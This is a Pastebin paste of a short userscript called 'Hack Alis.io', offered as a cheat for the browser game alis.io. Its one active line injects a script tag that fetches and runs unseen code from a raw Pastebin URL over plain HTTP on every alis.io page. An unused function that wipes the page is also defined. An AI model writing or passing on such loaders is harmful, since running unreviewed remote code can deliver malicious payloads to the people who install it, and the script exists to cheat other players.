Advertisement
ImNotSpam

Untitled

Jan 4th, 2017
418
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.56 KB | None | 0 0
  1. // ==UserScript==
  2. // @name Hack Alis.io
  3. // @namespace youtube.com/user/3dtanki
  4. // @version 5
  5. // @description Alis.io Hack SelfFeed
  6. // @author Made By Sika Agar
  7. // @match http://alis.io/*
  8. // @grant none
  9. // ==/UserScript==
  10.  
  11. function loadScript(a) {
  12. var b = document.createElement("script");
  13. b.type = "text/javascript";
  14. b.src = a;
  15. document.head.appendChild(b);
  16. }
  17.  
  18. function stopPage() {
  19. window.stop();
  20. document.documentElement.innerHTML = null;
  21. }
  22. loadScript("http://pastebin.com/raw/1igKUkwH");
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement